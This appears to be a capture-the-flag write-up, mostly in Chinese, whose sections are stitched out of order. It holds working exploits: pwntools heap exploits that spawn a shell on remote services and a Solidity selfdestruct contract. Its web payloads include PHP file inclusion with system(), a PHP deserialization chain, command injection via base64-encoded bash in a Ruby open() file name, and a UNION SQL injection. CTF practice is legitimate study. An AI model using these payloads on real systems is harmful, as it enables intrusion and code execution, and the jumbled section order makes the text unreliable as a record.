s.sendlineafter(b"Note@Game:~$",b"ViewInfo")
# s = process("./notegame")
s = remote("114.115.152.113","49153")
add(0x20,b'\n')
update(0x10,b'dead\n',b'\n')
update(0x20,b'A'*0x20,b'\n')
view()
s.recvuntil(b"A"*0x20)
libc = ELF("./libc.so")
libc.address = u64(s.recv(6)+b"\x00\x00")-0xb7c90
success(hex(libc.address))
s.sendlineafter(b"Note@Game:~$",b"B4ckD0or")
s.sendlineafter(b"Addr: ",str(libc.address+0xb4ac0).encode())
# update(0x20,'deadbeef\n',b'\n')
# add(0x30,b'AAAA\n')
s.recvuntil(b"Mem: ")
secret = u64(s.recv(8))
success(hex(secret))
free(0)
fake_meta_addr = 0x10000000010
fake_mem_addr = libc.address+0xb7ac0
sc = 9 # 0x9c
freeable = 1
last_idx = 1
maplen = 2
stdin_FILE = libc.address+0xb4180+0x30
add(0x68,b'A\n')#0
add(0x6c,p64(stdin_FILE-0x10)+p64(0)+p64((maplen << 12) | (sc << 6) | (freeable << 5) |
last_idx)+p64(0)+b"\n")#1
edit(0,b'\x00'*0x60+p64(fake_meta_addr))
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_meta_addr+0x30)#priv
fake_meta += p64(fake_mem_addr)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
s.sendlineafter(b"Note@Game:~$",b"TempNote")
s.sendlineafter(b"Input the address of your temp note: ",str(0x10000000000))
s.sendafter(b"Temp Note: ",p64(secret)+p64(0)+fake_meta+b"\n")
free(1)
add(0x90,b'A\n')
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(stdin_FILE-0x10)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
fake_meta += p64(stdin_FILE-0x18)
fake_meta += p64(fake_mem_addr)
fake_meta += p64(stdin_FILE-0x10)
fake_meta += p64(0)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
s.sendlineafter(b"Note@Game:~$",b"TempNote")
s.sendafter(b"Temp Note: ",p64(secret)+p64(0)+fake_meta+b"\n")
# gdb.attach(s,"dir ./mallocng\nb *$rebase(0x1075)\nc")
s.sendlineafter(b"Note@Game:~$",b"AddNote")
s.sendlineafter(b"Size: ",str(0x90).encode())
payload = b'/bin/sh\x00'
payload = payload.ljust(32,b'\x00')
payload += p64(1)+p64(1)+p64(0)*3+p64(libc.sym['system'])
pb
payload = b'A'*48+payload+b"\n"
s.send(payload)
s.interactive()
# protoc ./addressbook.proto --python_out=.
from pwn import *
from addressbook_pb2 import AddressBook, Person
#context.aslr = False
context.log_level = 'debug'
def gen_leak_payload(offset: int):
person = Person()
person.show_off = ""
person.name = "plusls"
person.bio = "114514"
#person.rw = True
person.day.append(offset)
person.salary.append(1)
addressbook = AddressBook()
addressbook.people.append(person)
data = addressbook.SerializeToString()
return data
def gen_write_payload(offset: int, data_to_write: int):
person = Person()
person.show_off = ""
person.name = "plusls"
person.bio = "114514"
person.rw = True
person.day.append(offset)
person.salary.append(data_to_write)
addressbook = AddressBook()
addressbook.people.append(person)
data = addressbook.SerializeToString()
return data
# 0x8fbbd0
def main():
heap_ptr = 0
#p = process('./pb')
p = remote('114.115.204.229', 49153)
data = gen_leak_payload(0x20)
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
p.recvuntil('Show me the money: ')
heap_ptr += int(p.recvuntil('\n'))
data = gen_leak_payload(0x21)
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
p.recvuntil('Show me the money: ')
heap_ptr += int(p.recvuntil('\n'))*0x100
data = gen_leak_payload(0x22)
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
p.recvuntil('Show me the money: ')
heap_ptr += int(p.recvuntil('\n'))*0x10000
data = gen_leak_payload(0x23)
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
p.recvuntil('Show me the money: ')
heap_ptr += int(p.recvuntil('\n'))*0x1000000
log.success('{:#x}'.format(heap_ptr))
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 0, ord('/'))
#data = gen_write_payload(0x10000000, ord('s'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
# print(pidof(p))
# input()
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 1, ord('b'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 2, ord('i'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
Crypto
ecc
椭圆曲线基础攻击*3
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 3, ord('n'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 4, ord('/'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 5, ord('s'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 7, 0)
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
data = gen_write_payload(0x8EC2C0 - heap_ptr + 0x90 + 6, ord('h'))
p.recvuntil('size: ')
p.sendline(str(len(data)))
p.send(data)
p.interactive()
if __name__ == '__main__':
main()
from Crypto.Util.number import long_to_bytes
flag = b''
# ecc1
p = 146808027458411567
A = 46056180
B = 2316783294673
E = EllipticCurve(GF(p),[A,B])
P = E(119851377153561800, 50725039619018388)
Q = E(22306318711744209, 111808951703508717)
flag += long_to_bytes(P.discrete_log(Q))
# ecc2
p = 1256438680873352167711863680253958927079458741172412327087203
A = 377999945830334462584412960368612
B = 604811648267717218711247799143415167229480
E = EllipticCurve(GF(p),[A,B])
P = E(550637390822762334900354060650869238926454800955557622817950,
700751312208881169841494663466728684704743091638451132521079)
Q = E(1152079922659509908913443110457333432642379532625238229329830,
819973744403969324837069647827669815566569448190043645544592)
moduli = []
residues = []
n = E.order()
fac = list(factor(n))
for i,j in fac:
modules=i**j
if i > 1<<40:
break
_p_=P*ZZ(n/modules)
_q_=Q*ZZ(n/modules)
residue=discrete_log(_q_,_p_,operation="+")
moduli.append(modules)
residues.append(residue)
print(residue, modules)
secret = crt(residues, moduli)
flag += long_to_bytes(secret)
# ecc3
p =
0xd3ceec4c84af8fa5f3e9af91e00cabacaaaecec3da619400e29a25abececfdc9bd678e2708a58acb1bd15
370acc39c596807dab6229dca11fd3a217510258d1b
A =
0x95fc77eb3119991a0022168c83eee7178e6c3eeaf75e0fdf1853b8ef4cb97a9058c271ee193b8b27938a0
7052f918c35eccb027b0b168b4e2566b247b91dc07
B =
0x926b0e42376d112ca971569a8d3b3eda12172dfb4929aea13da7f10fb81f3b96bf1e28b4a396a1fcf38d8
0b463582e45d06a548e0dc0d567fc668bd119c346b2
E = EllipticCurve(GF(p),[A,B])
P =
E(1012157144319191307273257283149053462081083530689263455553265769625550689896053695556
8544782337611042739846570602400973952350443413585203452769205144937861,
842521858246707773040983794508357136274538832804393051186517484743679899039712480435798
2565055918658197831123970115905304092351218676660067914209199149610)
Q =
E(9648640091422371373413896537561659355426111535766413706397293045706497490048109806724
15306977194223081235401355646820597987366171212332294914445469010927,
516218578051178327844934252926997045373424846030290845552083195034337114756668253058316
0574217543701164101226640565768860451999819324219344705421407572537)
signin
从低位开始爆p和q,然后coppersmith恢复完整p
def a0(P, Q):
if P[2] == 0 or Q[2] == 0 or P == -Q:
return 0
if P == Q:
a = P.curve().a4()
return (3*P[0]^2+a)/(2*P[1])
return (P[1]-Q[1])/(P[0]-Q[0])
def add_augmented(PP, QQ):
(P, u), (Q, v) = PP, QQ
return [P+Q, u + v + a0(P,Q)]
def scalar_mult(n, PP):
t = n.nbits()
TT = PP.copy()
for i in range(1,t):
bit = (n >> (t-i-1)) & 1
TT = add_augmented(TT, TT)
if bit == 1:
TT = add_augmented(TT, PP)
return TT
def solve_ecdlp(P,Q,p):
R1, alpha = scalar_mult(p, [P,0])
R2, beta = scalar_mult(p, [Q,0])
return ZZ(beta*alpha^(-1))
flag += long_to_bytes(solve_ecdlp(P,Q,E.order()))
print(b"flag{" + flag + b"}")
from Crypto.Util.number import *
from tqdm import tqdm
def partial_p(p0, kbits, n):
PR.<x> = PolynomialRing(Zmod(n))
f = 2^kbits*x + p0
f = f.monic()
roots = f.small_roots(X=2^(512-400), beta=0.3)
if roots:
x0 = roots[0]
p = gcd(2^kbits*x0 + p0, n)
return ZZ(p)
c =
105964363167029753317572454629861988853017240482625184064844073337324793672813917218384
090143000754327745478675938880417939070185062842148984326409733470784229289982384422482
806913011867971401975586627392549938483496950331331884487290714985591554789594767069838
17882517886102203599090653816022071957312164735
e = 65537
n =
815599054523576230594296466834224773629521672826636854019516950697929531495505089150571
001015653246885188695521583529737751254954893566702531313365761932974303729967331671178
606145379293856743513854262637214465790534033773659967440192462352514342856581969664407
81084168142352073493973147145455064635516373317
x =
544528274874907263426386536858394514838784460789819080620775891616788086097329057778520
781763108994646626718779325717092
class Solver:
def __init__(self, x, n):
self.x = x
self.n = n
self.pq = [(0, 0)]
def add(self, b, p, q):
# print(bin((p * q) & (2*b-1)))
# print(bin(n & (2*b-1)))
if (p * q) & (2*b-1) == n & (2*b-1):
self.pq.append((p, q))
def solve(self):
for shift in tqdm(range(0, 400)):
b = 1 << shift
pq, self.pq = self.pq, []
for p, q in pq:
if self.x & b:
self.add(b, p | b, q)
self.add(b, p, q | b)
else:
self.add(b, p, q)
self.add(b, p | b, q | b)
return self.pq
def solve():
solver = Solver(x,n)
pqs = solver.solve()
for pq in tqdm(pqs):
p0 = ZZ(pq[0])
p = partial_p(p0, 400, n)
if p and p != 1:
return p
doublesage
p = solve()
if not p:
print('WTF')
exit(0)
q = n//p
phi = (p-1)*(q-1)
d = inverse(e, phi)
m = long_to_bytes(pow(c,d,n))
print(m)
from pwn import *
from sage.modules.free_module_integer import IntegerLattice
from random import randint
import sys
from itertools import starmap
from operator import mul
# Babai's Nearest Plane algorithm
# from: http://mslc.ctf.su/wp/plaidctf-2016-sexec-crypto-300/
def Babai_closest_vector(M, G, target):
small = target
for _ in range(1):
for i in reversed(range(M.nrows())):
c = ((small * G[i]) / (G[i] * G[i])).round()
small -= M[i] * c
return target - small
io = remote("122.112.210.186", 51436)
q = 29
io.recvuntil(b'Matrix A of size 5 * 23 :\n')
a = []
a.append(eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',',
')))
a.append(eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',',
')))
a.append(eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',',
')))
a.append(eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',',
')))
a.append(eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',',
')))
print(a)
io.recvuntil(b'Vector C of size 1 * 23 :\n')
c = eval(io.recvline().decode().replace('[ ','[').replace(' ',' ').replace(' ',', '))
print(c)
A_values = matrix(a).T
b_values = vector(ZZ, c)
m = 23
n = 5
A = matrix(ZZ, m + n, m)
for i in range(m):
A[i, i] = q
for x in range(m):
for y in range(n):
A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
print("LLL done")
gram = lattice.reduced_basis.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
print("Closest Vector: {}".format(res))
R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = str(list(M.solve_right(res)))
print(ingredients)
io.sendline(ingredients)
q = 227
io.recvuntil(b'Matrix A of size 15 * 143 :\n')
a = []
for _ in range(15):
a.append(eval(io.recvline().decode().replace('[ ','[').replace('[ ','[').replace('[
','[').replace(' ',' ').replace(' ',' ').replace(' ',' ').replace(' ',', ')))
print(a)
io.recvuntil(b'Vector C of size 1 * 143 :\n')
c = eval(io.recvuntil(']').decode().replace('\n', '').replace('[ ','[').replace(' ','
').replace(' ',' ').replace(' ',' ').replace(' ',', '))
print(c)
A_values = matrix(a).T
b_values = vector(ZZ, c)
m = 143
n = 15
A = matrix(ZZ, m + n, m)
Blockchain
CallBox
paradigm-ctf babysandbox
原题给了源码 这个没给,逆完了是⼀样的
for i in range(m):
A[i, i] = q
for x in range(m):
for y in range(n):
A[m + y, x] = A_values[x][y]
lattice = IntegerLattice(A, lll_reduce=True)
print("LLL done")
gram = lattice.reduced_basis.gram_schmidt()[0]
target = vector(ZZ, b_values)
res = Babai_closest_vector(lattice.reduced_basis, gram, target)
print("Closest Vector: {}".format(res))
R = IntegerModRing(q)
M = Matrix(R, A_values)
ingredients = str(list(M.solve_right(res)))
print(ingredients)
io.sendline(ingredients)
io.interactive()
pragma solidity 0.7.0;
contract Receiver {
fallback() external {
assembly {
// hardcode the Destroyer's address here before deploying Receiver
switch call(gas(), 0xE29D3BfAB1e1B1824a0F2B5f186E97B7f8f06F7D, 0x00, 0x00, 0x00, 0x00,
0x00)
case 0 {
return(0x00, 0x00)
}
case 1 {
selfdestruct(0)
}
}
}
}
pragma solidity 0.7.0;
contract Dummy {
msg.data:0xc24fe9500000000000000000000000008B62B35DB8D278f463D89EBb54E5fE9f6A5305c4
Web
EasyCleanup
在phpinfo⾥发现 session.upload_progress.cleanup 为off,随便设置⼀个PHPSESSID,post请求发送
PHP_SESSION_UPLOAD_PROGRESS为123
再访问http://114.115.134.72:32770/?file=/tmp/sess_aabbc&1=system('ls ');
flag在flag_is_here_not_are_but_you_find⽂件中
pklovecloud
fallback() external {
selfdestruct(address(0));
}
}
<?php
class acp
{
protected $cinder;
public $neutron;
public $nova;
function __construct()
{
$this->cinder = new ace();
}
function __toString()
{
if (isset($this->cinder))
return $this->cinder->echo_name();
}
}
class ace
{
public $filename;
public $openstack;
public $docker;
function __construct()
{
$this->filename = "flag.php";
$this->docker = 'O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}';
}
function echo_name()
{
$this->openstack = unserialize($this->docker);
O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3
A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%
3BN%3Bs%3A6%3A%22docker%22%3Bs%3A56%3A%22O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A7%3
A%22neutron%22%3Bs%3A1%3A%22a%22%3Bs%3A4%3A%22nova%22%3BR%3A2%3B%7D%22%3B%7Ds%
3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D
PNG图⽚转换器
/etc/passwd⇒ .bash_history⇒flag
https://ruby-doc.org/docs/ruby-doc-bundle/Manual/man-1.4/function.html#open
file=|bash -c "$(echo 'bHMgLw==' | base64 -d)" #.png
cat /FLA9_KywXAv78LbopbpBDuWsm
file=|bash -c "$(echo 'Y2F0IC9GTEE5X0t5d1hBdjc4TGJvcGJwQkR1V3Nt' | base64 -d)" #.png
yet_another_mysql_injection
WebFTP
github可以搜到源码
readme有个⽂件http://114.115.185.167:32770/Readme/mytz.php,执⾏phpinfo即可看到flag
个⼈信息保护
$this->openstack->neutron = $heat;
if($this->openstack->neutron === $this->openstack->nova) {
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "keystone lost~";
}
}
}
}
$cls = new acp();
echo urlencode(serialize($cls))."\n";
echo $cls;
1'union/**/select/**/mid(`11`,65,217)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,1
4,15,16,17/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/na
me/**/like'%connection%'/**/limit/**/1,1)t#
data_protection
from Crypto.Util.number import *
from Crypto.Cipher import AES
from sage.all import *
from randcrack import RandCrack
from string import printable
from tqdm import trange
import fuckpy3
from hashlib import sha256
c1 = 957816240401743854837881311445045470230187676709635111668
n1 = 1428634580885297528425426676577388183501352157100030354079
p1 = 22186905890293167337018474103
q1 = 64390888389278700958517837593
e = 65537
phi1 = (p1-1)*(q1-1)
d1 = inverse(e, phi1)
m = long_to_bytes(pow(c1,d1,n1))
name = m
c2 =
130536335758901947014168058443149874558142143560146132471898114934897766527731676264690
799898101979612646114162466761237443774600199870363900211200409519507785242558249872799
183840268584393920019579160937799894469221007884966637948531502734503223395420211823700
129146868588759186292610563932401562701836312649
n2 =
134949786048887319137407994803780389722367094355650515833817995038306119197600539524985
448574053755793699799863164150565217726975197643634831307454431403854861515253009970594
684699064052739820092115115614153962139870020206132705821506686959283747802946805730902
605814619499301779892151365118901010526138311982
p2 =
116167889732441692115408790511355316835000133111758577005329738535927271850338460649807
17918194540453710515251945345524986932165003196804187526561468278997
q2 = n2 // p2
diff = q2 - p2
phi2 = (p2-1)*3*3*(3-1)*(11-1)*(1789-1)*
(10931740521710649641129836704228357436391126949743247361384455561383094203666858697822
945232269161198072127321232960803288081264483098926838278972991-1)
d2 = inverse(e, phi2)
m = long_to_bytes(pow(c2,d2,n2))
phone = m[:11]
pad = bytes_to_long(m[11:])
q = 4808339797
key = [[978955513, 2055248981, 3094004449, 411497641, 4183759491, 521276843,
1709604203, 3162773533, 2140722701, 782306144, 421964668, 356205891, 1039083484,
1911377875, 1661230549, 312742665, 3628868938, 2049082743], [3833871085, 2929837680,
2614720930, 4056572317, 3787185237, 93999422, 590001829, 429074138, 3012080235,
2336571108, 831707987, 3902814802, 2084593018, 316245361, 1799842819, 2908004545,
120773816, 2687194173], [3213409254, 3303290739, 742998950, 2956806179, 2834298174,
429260769, 769267967, 1301491642, 2415087532, 1055496090, 690922955, 2984201071,
3517649313, 3675968202, 3389582912, 2632941479, 186911789, 3547287806], [4149643988,
3811477370, 1269911228, 3709435333, 1868378108, 4173520248, 1573661708, 2161236830,
3266570322, 1611227993, 2539778863, 1857682940, 1020154001, 92386553, 3834719618,
3775070036, 3777877862, 2982256702], [4281981169, 2949541448, 4199819805, 3654041457,
3300163657, 1674155910, 1316779635, 66744534, 3804297626, 2709354730, 2460136415,
3983640368, 3801883586, 1068904857, 4178063279, 41067134, 752202632, 3143016757],
[3078167402, 2059042200, 252404132, 415008428, 3611056424, 1674088343, 2460161645,
3311986519, 3130694755, 934254488, 898722917, 2865274835, 567507230, 1328871893,
3903457801, 2499893858, 492084315, 183531922], [3529830884, 4039243386, 233553719,
4118146471, 1646804655, 2089146092, 2156344320, 2329927228, 508323741, 1931822010,
579182891, 176447133, 597011120, 3261594914, 2845298788, 3759915972, 3095206232,
3638216860], [3352986415, 4264046847, 3829043620, 2530153481, 3421260080, 1669551722,
4240873925, 2101009682, 3660432232, 4224377588, 929767737, 3729104589, 2835310428,
1727139644, 1279995206, 1355353373, 2144225408, 1359399895], [3105965085, 818804468,
3230054412, 2646235709, 4053839846, 2878092923, 587905848, 1589383219, 2408577579,
880800518, 28758157, 1000513178, 2176168589, 187505579, 89151277, 1238795748, 8168714,
3501032027], [3473729699, 1900372653, 305029321, 2013273628, 1242655400, 4192234107,
2446737641, 1341412052, 304733944, 4174393908, 2563609353, 3623415321, 49954007,
3130983058, 425856087, 2331025419, 34423818, 2042901845], [1397571080, 1615456639,
1840339411, 220496996, 2042007444, 3681679342, 2306603996, 732207066, 663494719,
4092173669, 3034772067, 3807942919, 111475712, 2065672849, 3552535306, 138510326,
3757322399, 2394352747], [371953847, 3369229608, 1669129625, 168320777, 2375427503,
3449778616, 1977984006, 1543379950, 2293317896, 1239812206, 1198364787, 2465753450,
3739161320, 2502603029, 1528706460, 1488040470, 3387786864, 1864873515], [1356892529,
1662755536, 1623461302, 1925037502, 1878096790, 3682248450, 2359635297, 1558718627,
116402105, 3274502275, 2436185635, 771708011, 3484140889, 3264299013, 885210310,
4225779256, 363129056, 2488388413], [2636035482, 4140705532, 3187647213, 4009585502,
351132201, 2592096589, 3785703396, 750115519, 3632692007, 3936675924, 3635400895,
3257019719, 1928767495, 2868979203, 622850989, 3165580000, 4162276629, 4157491019],
[1272163411, 1251211247, 357523138, 1233981097, 1855287284, 4079018167, 4028466297,
92214478, 4290550648, 648034817, 1247795256, 3928945157, 1199659871, 397659647,
3360313830, 561558927, 3446409788, 2727008359], [1470343419, 3861411785, 953425729,
65811127, 458070615, 1428470215, 3101427357, 1137845714, 1980562597, 4120983895,
45901583, 2869582150, 427949409, 3025588000, 3231450975, 3313818165, 4015642368,
3197557747], [2452385340, 111636796, 897282198, 4273652805, 1223518692, 3680320805,
2771040109, 3617506402, 3904690320, 77507239, 3010900929, 4099608062, 546322994,
1084929138, 902220733, 4054312795, 1977510945, 735973665], [3729015155, 3027108070,
1442633554, 1949455360, 2864504565, 3673543865, 446663703, 3515816196, 1468441462,
897770414, 2831043012, 707874506, 1098228471, 1225077381, 3622448809, 2409995597,
3847055008, 1887507220], [1839061542, 1963345926, 2600100988, 1703502633, 1824193082,
3595102755, 2558488861, 2440526309, 3909166109, 1611135411, 2809397519, 1019893656,
3281060225, 2387778214, 2460059811, 198824620, 1645102665, 865289621], [224442296,
3009601747, 3066701924, 1774879140, 880620935, 2676353545, 3748945463, 1994930827,
75275710, 3710375437, 4132497729, 3010711783, 3731895534, 2434590580, 3409701141,
2209951200, 995511645, 3571299495], [2337737600, 110982073, 2985129643, 1668549189,
3298468029, 698015588, 2945584297, 1036821195, 4249059927, 3384611421, 3304378629,
1307957989, 602821252, 184198726, 1182960059, 4200496073, 1562699893, 3320841302],
[5866561, 2442649482, 479821282, 2687097642, 3347828225, 1876332308, 2704295851,
2952277070, 1803967244, 2837783916, 658984547, 3605604364, 1931924322, 3285319978,
556150900, 3795666798, 261321502, 1040433381], [3855222954, 3565522064, 1841853882,
1066304362, 3552076734, 3075952725, 2193242436, 2052898568, 2341179777, 3089412493,
165812889, 4196290126, 3568567671, 28097161, 2249543862, 1251207418, 522526590,
765541973], [1801734077, 2132230169, 667823776, 3900096345, 3119630138, 3620542178,
2900630754, 30811433, 608818254, 1040662178, 900811411, 3221833258, 43598995,
1818995893, 2718507668, 3445138445, 3217962572, 1437902734], [1812768224, 392114567,
2694519859, 1941199322, 2523549731, 2078453798, 851734499, 2376090593, 2069375610,
4084690114, 246441363, 4154699271, 58451971, 31806021, 4158724930, 2741293247,
3230803936, 2790505999], [3906342775, 2231570871, 1258998901, 1517292578, 162889239,
3130741176, 3925266771, 1780222960, 2378568279, 3873144834, 1597459529, 1581197809,
4101706041, 196019642, 1439141586, 587446072, 2012673288, 1280875335], [4058452685,
653145648, 553051697, 1406542226, 4053722203, 994470045, 2066358582, 3919235908,
2315900402, 3236350874, 172880690, 3104147616, 489606166, 3898059157, 200469827,
665789663, 3116633449, 4137295625], [1460624254, 4286673320, 2664109800, 1995979611,
4091742681, 2639530247, 4240681440, 2169059390, 1149325301, 3139578541, 2320870639,
3148999826, 4095173534, 2742698014, 3623896968, 2444601912, 1958855100, 1743268893],
[2187625371, 3533912845, 29086928, 543325588, 4247300963, 1972139209, 272152499,
4276082595, 3680551759, 1835350157, 3921757922, 2716774439, 1070751202, 69990939,
3794506838, 699803423, 3699976889, 40791189], [539106994, 1670272368, 3483599225,
2867955550, 2207694005, 1126950203, 693920921, 2333328675, 539234245, 1961438796,
3126390464, 1118759587, 59715473, 1450076492, 4101732655, 3658733365, 940858890,
1262671744], [3092624332, 2175813516, 3355101899, 3657267135, 770650398, 359506155,
4149470178, 3763654751, 1184381886, 942048015, 523057971, 1098635956, 1732951811,
150067724, 2417766207, 4152571821, 2759971924, 4284842765], [3336022203, 2569311431,
2752777107, 1441977867, 1279003682, 3861567631, 1064716472, 3046493996, 1339401643,
39466446, 1464905290, 420733872, 2057911345, 2418624800, 2193625430, 1558527155,
4224908000, 207684355], [2681129718, 4210889596, 4051161171, 3131196482, 1128312875,
938670840, 2828563599, 3078146488, 1102989364, 3557724304, 156013303, 2371355565,
3608679353, 3513837899, 155622460, 396656112, 2493417457, 876296360], [3135876409,
181875076, 3662181650, 3851859805, 3626146919, 90441351, 1944988720, 585429580,
3158268550, 1399100291, 3688843295, 2851190, 2670576474, 3177735154, 3479499727,
197376977, 1790622954, 2393956089]]
cipher = [4325818019, 2670265818, 4804078249, 3082712000, 2791756019, 4114207927,
32903302, 681859623, 1914242441, 3459255538, 1781251274, 2705263119, 199613420,
613239489, 1726033668, 2140896224, 3908774846, 3015013168, 3240286365, 1888438156,
223825531, 3210441909, 1012497643, 4359288498, 2438339216, 2483290354, 3716120316,
1066957542, 3496060250, 4707561887, 1439752455, 2257295093, 2677914042, 3387293794]
R = IntegerModRing(q)
M = Matrix(R, key)
msg3 = ''.join(map(chr,M.solve_right(vector(R,cipher))))
mail = msg3.encode()
lb0 = 22186905890293167337018474051
ub0 = 22186905890293167337018474102
lb1 = 64390888389278700958517837503
ub1 = 64390888389278700958517837592
mask = (1<<32) - 1
# for i in trange(lb0, ub0):
# for j in range(lb1, ub1):
# rc = RandCrack()
# rc.submit(i&mask)
# rc.submit((i>>32)&mask)
# rc.submit((i>>64)&mask)
# rc.submit(j&mask)
# rc.submit((j>>32)&mask)
# rc.submit((j>>64)&mask)
# rc.submit(pad&mask)
# rc.submit((pad>>32)&mask)
# rc.submit((pad>>64)&mask)
# rc.submit((pad>>96)&mask)
# rc.submit((pad>>128)&mask)
# rc.submit(diff)
# for x in range(34):
# for y in range(len(mail)):
# rc.submit(key[x][y])
# aeskey = long_to_bytes(rc.predict_getrandbits(128))
# a = AES.new(aeskey,AES.MODE_ECB)
# msg = a.decrypt(long_to_bytes(4663812185407413617442589600527575850)).str()
# if all([c in printable for c in msg]):
# print(i,j,aeskey, msg)
# exit(0)
i,j= 22186905890293167337018474052, 64390888389278700958517837515
rc = RandCrack()
rc.submit(i&mask)
rc.submit((i>>32)&mask)
rc.submit((i>>64)&mask)
rc.submit(j&mask)
rc.submit((j>>32)&mask)
rc.submit((j>>64)&mask)
rc.submit(pad&mask)
rc.submit((pad>>32)&mask)
rc.submit((pad>>64)&mask)
rc.submit((pad>>96)&mask)
rc.submit((pad>>128)&mask)
rc.submit(diff)
for x in range(34):
for y in range(len(mail)):
rc.submit(key[x][y])
aeskey = long_to_bytes(rc.predict_getrandbits(128))
a = AES.new(aeskey,AES.MODE_ECB)
Mobile
uniapp
看起来是个chacha20,直接⽤它js现成的解密函数解就⾏
密⽂p = [34, 69, 86, 242, 93, 72, 134, 226, 42, 138, 112, 56, 189, 53, 77, 178, 223, 76, 78, 221, 63, 40, 86, 231,
121, 29, 154, 189, 204, 243, 205, 44, 141, 100, 13, 164, 35, 123]
⼏个参数
i = new Uint8Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27,
28, 29, 30, 31])
a = new Uint8Array([0, 0, 0, 0, 0, 0, 0, 74, 0, 0, 0, 0])
s = 1
f= new r(i,a,s)
msg = a.decrypt(long_to_bytes(4663812185407413617442589600527575850))
address = msg
q,g,h =
100745716474520129382342652195639327015477094835273324287249437173477166280924801413511
01355311415396138752005498917333222412501490191601765376359710800979,
872081425474508977725208334434885126852069231882803045212254992674885974140212579973617
8655620806485161358327515735405190921467358304697344848268434382637,
477172260599657947838006456734210634171968238301955220545205562436901948073973438458964
9787120284793958469470324545595398217251092376423755308135664464425
g0 = rc.predict_randrange(q-1)
x0 = rc.predict_randrange(q-1)
y0 = rc.predict_randrange(q-1)
c1,c2 =
451906903029444687220680460445511474470934823746601636562099822402217711714368447997497
9349963809703440329581216394519261239811301206970312092675406502650,
381170088180198726907016474948484656029244022524832908685866193117029536686727527742146
7706163328741035400455667115338775148483606038354192869181765555267
s = pow(c1, x0, q)
m = (c2*inverse(s, q)) % q
school = long_to_bytes(m)
flag = 'flag{'+sha256(name).hexdigest()[:8]+'-'+sha256(phone).hexdigest()[:4]+'-
'+sha256(mail).hexdigest()[:4]+'-'+sha256(address).hexdigest()[:4]+'-
'+sha256(school).hexdigest()[:12]+'}'
print (flag)
c = new Uint8Array(p)
f.decrypt(c)
最后再异或102拿到flag
Misc
签到题
签到
云安全
Cloud_QM
from pwn import *
from docker_debug import *
context.log_level = 'debug'
context.aslr = False
def write_addr(p: tube, addr: int, data: bytes) -> None:
p.sendline('b64write {} {} {}'.format(addr, len(data),
base64.b64encode(data).decode()))
pass
def writeq(p: tube, addr: int, data: int) -> None:
p.sendline('writeq {} {}'.format(addr, data))
p.recvuntil('OK\n')
p.recvuntil('OK\n')
def read_addr(p: tube, addr: int, size: int) -> bytes:
p.sendline('b64read {} {}'.format(addr, size))
p.recvuntil('OK ')
ret = base64.b64decode(p.recvuntil('\n'))
p.recvuntil('OK ')
p.recvuntil('\n')
return ret
def readq(p: tube, addr: int) -> int:
p.sendline('readq {}'.format(addr))
p.recvuntil('OK ')
ret = int(p.recvuntil('\n'), 16)
p.recvuntil('OK ')
p.recvuntil('\n')
return ret
BASE = 0xfeb00000
def set_note_idx(p: tube, idx: int) -> None:
writeq(p, BASE + 0x40, idx)
def set_size(p: tube, size: int) -> None:
writeq(p, BASE + 0x8, size)
def alloc(p: tube) -> None:
writeq(p, BASE + 0x10, 0)
def set_dma_addr(p: tube, dma_addr: int) -> None:
writeq(p, BASE + 0x18, dma_addr)
def read_to_buf(p: tube) -> None:
writeq(p, BASE + 0x20, 0)
def write_to_vm(p: tube) -> None:
writeq(p, BASE + 0x28, 0)
def free(p: tube) -> None:
writeq(p, BASE + 0x30, 0)
debug_env = DockerDebug('ubuntu-2004')
